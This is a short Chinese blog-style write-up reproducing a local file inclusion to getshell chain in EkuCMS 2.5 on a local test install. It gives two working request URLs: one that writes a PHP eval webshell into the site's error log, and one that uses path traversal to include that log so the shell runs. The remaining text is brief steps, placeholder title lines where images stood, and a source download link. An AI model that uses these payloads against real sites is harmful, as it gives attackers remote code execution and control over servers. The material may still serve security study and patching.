易酷 cms2.5  本地文件包含漏洞 getshell

首先下载源码安装(http://127.0.0.1/test/ekucms2.5/install.php)

 安装成功直接进行复现吧

本地包含一句话木马

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/{~eval($_POST[orange])}

 易酷 cms2.5  本地文件包含漏洞 getshell

 

会在网站的/temp/Logs/目录下生成一个错误日志,命名规则为年_月_日

错误日志内容

易酷 cms2.5  本地文件包含漏洞 getshell

 

进行包含错误日志,地址:

http://127.0.0.1/test/ekucms2.5/?s=my/show/id/\..\temp\logs\18_04_18.log

 易酷 cms2.5  本地文件包含漏洞 getshell

 

验证下:

易酷 cms2.5  本地文件包含漏洞 getshell易酷 cms2.5  本地文件包含漏洞 getshell

 

 

源码链接(链接: https://pan.baidu.com/s/1K8dmimbrqO41tNemhnKeAQ 密码: 3y48)

 

相关文章:

  • 2022-03-13
  • 2021-09-26
  • 2021-12-15
  • 2021-05-23
  • 2022-12-23
  • 2022-01-01
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2021-09-29
  • 2021-04-11
  • 2021-11-18
  • 2021-09-29
  • 2021-05-18
  • 2021-04-18
相关资源
相似解决方案